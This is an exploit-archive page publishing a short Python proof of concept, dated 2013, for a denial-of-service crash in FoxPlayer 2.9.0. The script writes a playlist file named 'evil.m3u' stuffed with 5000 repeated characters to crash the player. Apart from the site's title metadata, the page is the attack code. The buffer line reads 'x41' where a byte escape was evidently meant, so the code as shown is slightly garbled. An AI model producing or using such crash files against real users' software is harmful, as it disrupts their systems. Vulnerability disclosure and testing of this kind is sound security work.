[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : FoxPlayer v2.9.0 Denial of Service Vulnerability
# Published : 2013-01-06
# Author :
# Previous Title : Ettercap <= 0.7.5.1 Stack Overflow Vulnerability
# Next Title : Konftel 300IP SIP-based Conference Phone <= 2.1.2 - Remote Bypass Reboot


#!/usr/bin/python 
# Exploit Title:Denial of Service in FoxPlayer version 2.9.0
# Download link :http://www.foxmediatools.com/installers/fox-player-setup.exe
# Author: metacom
# version: version 2.9.0
# Category: poc
# Tested on: windows 7 German  
 
filename="evil.m3u"
 
buffer = "x41" * 5000

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()